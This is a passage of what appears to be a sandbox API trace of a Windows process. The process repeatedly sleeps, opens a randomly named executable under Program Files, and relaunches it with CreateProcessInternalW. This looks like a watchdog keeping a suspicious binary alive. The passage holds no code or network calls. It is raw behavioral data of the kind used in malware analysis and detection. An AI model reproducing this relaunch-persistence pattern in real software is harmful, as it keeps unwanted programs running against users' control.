(dwMilliseconds=0x1388) [0189.243] Sleep (dwMilliseconds=0x1388) [0189.245] Sleep (dwMilliseconds=0x1388) [0189.246] Sleep (dwMilliseconds=0x1388) [0189.248] Sleep (dwMilliseconds=0x1388) [0189.249] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.249] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2170, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.253] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.253] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64300) returned 1 [0189.253] NtQueryInformationFile (in: FileHandle=0x2170, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0189.253] NtClose (Handle=0x2170) returned 0x0 [0189.254] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.254] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2170, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.254] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.254] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65900) returned 1 [0189.254] NtClose (Handle=0x2170) returned 0x0 [0189.257] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2188, hThread=0x2170, dwProcessId=0x1394, dwThreadId=0x230), hNewToken=0x0) returned 1 [0189.274] Sleep (dwMilliseconds=0x1388) [0189.275] Sleep (dwMilliseconds=0x1388) [0189.276] Sleep (dwMilliseconds=0x1388) [0189.278] Sleep (dwMilliseconds=0x1388) [0189.279] Sleep (dwMilliseconds=0x1388) [0189.281] Sleep (dwMilliseconds=0x1388) [0189.282] Sleep (dwMilliseconds=0x1388) [0189.284] Sleep (dwMilliseconds=0x1388) [0189.288] Sleep (dwMilliseconds=0x1388) [0189.290] Sleep (dwMilliseconds=0x1388) [0189.291] Sleep (dwMilliseconds=0x1388) [0189.293] Sleep (dwMilliseconds=0x1388) [0189.294] Sleep (dwMilliseconds=0x1388) [0189.296] Sleep (dwMilliseconds=0x1388) [0189.297] Sleep (dwMilliseconds=0x1388) [0189.299] Sleep (dwMilliseconds=0x1388) [0189.305] Sleep (dwMilliseconds=0x1388) [0189.307] Sleep (dwMilliseconds=0x1388) [0189.309] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.309] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x216c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.309] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.309] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65500) returned 1 [0189.309] NtQueryInformationFile (in: FileHandle=0x216c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0189.309] NtClose (Handle=0x216c) returned 0x0 [0189.309] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.309] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x216c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.310] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.310] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65200) returned 1 [0189.310] NtClose (Handle=0x216c) returned 0x0 [0189.312] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2174, hThread=0x216c, dwProcessId=0x1370, dwThreadId=0x1280), hNewToken=0x0) returned 1 [0189.328] Sleep (dwMilliseconds=0x1388) [0189.329] Sleep (dwMilliseconds=0x1388) [0189.331] Sleep (dwMilliseconds=0x1388) [0189.332] Sleep (dwMilliseconds=0x1388) [0189.336] Sleep (dwMilliseconds=0x1388) [0189.340] Sleep (dwMilliseconds=0x1388) [0189.341] Sleep (dwMilliseconds=0x1388) [0189.343] Sleep (dwMilliseconds=0x1388) [0189.344] Sleep (dwMilliseconds=0x1388) [0189.346] Sleep (dwMilliseconds=0x1388) [0189.347] Sleep (dwMilliseconds=0x1388) [0189.353] Sleep (dwMilliseconds=0x1388) [0189.355] Sleep (dwMilliseconds=0x1388) [0189.357] Sleep (dwMilliseconds=0x1388) [0189.359] Sleep (dwMilliseconds=0x1388) [0189.360] Sleep (dwMilliseconds=0x1388) [0189.361] Sleep (dwMilliseconds=0x1388) [0189.363] Sleep (dwMilliseconds=0x1388) [0189.364] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.364] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2120, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.365] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.365] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65e00) returned 1 [0189.365] NtQueryInformationFile (in: FileHandle=0x2120, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0189.365] NtClose (Handle=0x2120) returned 0x0 [0189.365] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.365] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2120, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.365] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.365] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0189.369] NtClose (Handle=0x2120) returned 0x0 [0189.371] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2168, hThread=0x2120, dwProcessId=0x13cc, dwThreadId=0xf74), hNewToken=0x0) returned 1 [0189.390] Sleep (dwMilliseconds=0x1388) [0189.391] Sleep (dwMilliseconds=0x1388) [0189.392] Sleep (dwMilliseconds=0x1388) [0189.394] Sleep (dwMilliseconds=0x1388) [0189.395] Sleep (dwMilliseconds=0x1388) [0189.397] Sleep (dwMilliseconds=0x1388) [0189.399] Sleep (dwMilliseconds=0x1388) [0189.400] Sleep (dwMilliseconds=0x1388) [0189.404] Sleep (dwMilliseconds=0x1388) [0189.405] Sleep (dwMilliseconds=0x1388) [0189.406] Sleep (dwMilliseconds=0x1388) [0189.408] Sleep (dwMilliseconds=0x1388) [0189.410] Sleep (dwMilliseconds=0x1388) [0189.411] Sleep (dwMilliseconds=0x1388) [0189.413] Sleep (dwMilliseconds=0x1388) [0189.414] Sleep (dwMilliseconds=0x1388) [0189.416] Sleep (dwMilliseconds=0x1388) [0189.425] Sleep (dwMilliseconds=0x1388) [0189.426] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.427] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x214c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.427] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.427] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65e00) returned 1 [0189.427] NtQueryInformationFile (in: FileHandle=0x214c, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0189.427] NtClose (Handle=0x214c) returned 0x0 [0189.427] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.427] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x214c, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.427] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.427] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65200) returned 1 [0189.427] NtClose (Handle=0x214c) returned 0x0 [0189.430] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x20a8, hThread=0x214c, dwProcessId=0x1380, dwThreadId=0x13d4), hNewToken=0x0) returned 1 [0189.445] Sleep (dwMilliseconds=0x1388) [0189.446] Sleep (dwMilliseconds=0x1388) [0189.448] Sleep (dwMilliseconds=0x1388) [0189.452] Sleep (dwMilliseconds=0x1388) [0189.453] Sleep (dwMilliseconds=0x1388) [0189.455] Sleep (dwMilliseconds=0x1388) [0189.456] Sleep (dwMilliseconds=0x1388) [0189.462] Sleep (dwMilliseconds=0x1388) [0189.463] Sleep (dwMilliseconds=0x1388) [0189.468] Sleep (dwMilliseconds=0x1388) [0189.469] Sleep (dwMilliseconds=0x1388) [0189.471] Sleep (dwMilliseconds=0x1388) [0189.472] Sleep (dwMilliseconds=0x1388) [0189.474] Sleep (dwMilliseconds=0x1388) [0189.475] Sleep (dwMilliseconds=0x1388) [0189.477] Sleep (dwMilliseconds=0x1388) [0189.479] Sleep (dwMilliseconds=0x1388) [0189.484] Sleep (dwMilliseconds=0x1388) [0189.485] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.486] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2154, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.486] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.486] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65480) returned 1 [0189.486] NtQueryInformationFile (in: FileHandle=0x2154, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0189.486] NtClose (Handle=0x2154) returned 0x0 [0189.486] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.486] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2154, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.486] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.486] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65580) returned 1 [0189.486] NtClose (Handle=0x2154) returned 0x0 [0189.489] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2108, hThread=0x2154, dwProcessId=0x13e4, dwThreadId=0x13c8), hNewToken=0x0) returned 1 [0189.507] Sleep (dwMilliseconds=0x1388) [0189.509] Sleep (dwMilliseconds=0x1388) [0189.510] Sleep (dwMilliseconds=0x1388) [0189.512] Sleep (dwMilliseconds=0x1388) [0189.516] Sleep (dwMilliseconds=0x1388) [0189.517] Sleep (dwMilliseconds=0x1388) [0189.520] Sleep (dwMilliseconds=0x1388) [0189.522] Sleep (dwMilliseconds=0x1388) [0189.524] Sleep (dwMilliseconds=0x1388) [0189.527] Sleep (dwMilliseconds=0x1388) [0189.528] Sleep (dwMilliseconds=0x1388) [0189.534] Sleep (dwMilliseconds=0x1388) [0189.537] Sleep (dwMilliseconds=0x1388) [0189.539] Sleep (dwMilliseconds=0x1388) [0189.540] Sleep (dwMilliseconds=0x1388) [0189.542] Sleep (dwMilliseconds=0x1388) [0189.545] Sleep (dwMilliseconds=0x1388) [0189.551] Sleep (dwMilliseconds=0x1388) [0189.553] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.553] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2140, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.553] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.553] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65200) returned 1 [0189.553] NtQueryInformationFile (in: FileHandle=0x2140, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0189.553] NtClose (Handle=0x2140) returned 0x0 [0189.554] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.554] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x2140, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0189.554] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0189.554] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65480) returned 1 [0189.554] NtClose (Handle=0x2140) returned 0x0 [0189.556] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x2164, hThread=0x2140, dwProcessId=0x13dc, dwThreadId=0x1390), hNewToken=0x0) returned 1 [0189.574] Sleep (dwMilliseconds=0x1388) [0189.575] Sleep (dwMilliseconds=0x1388) [0189.577] Sleep (dwMilliseconds=0x1388) [0189.578] Sleep (dwMilliseconds=0x1388) [0189.580] Sleep (dwMilliseconds=0x1388) [0189.581] Sleep (dwMilliseconds=0x1388) [0189.583] Sleep (dwMilliseconds=0x1388) [0189.589] Sleep (dwMilliseconds=0x1388) [0189.594] Sleep (dwMilliseconds=0x1388) [0189.595] Sleep (dwMilliseconds=0x1388) [0189.597] Sleep (dwMilliseconds=0x1388) [0189.599] Sleep (dwMilliseconds=0x1388) [0189.655] Sleep (dwMilliseconds=0x1388) [0189.657] Sleep (dwMilliseconds=0x1388) [0189.659] Sleep (dwMilliseconds=0x1388) [0189.660] Sleep (dwMilliseconds=0x1388) [0189.662] Sleep (dwMilliseconds=0x1388) [0189.663] Sleep (dwMilliseconds=0x1388) [0189.668] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0189.668] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, 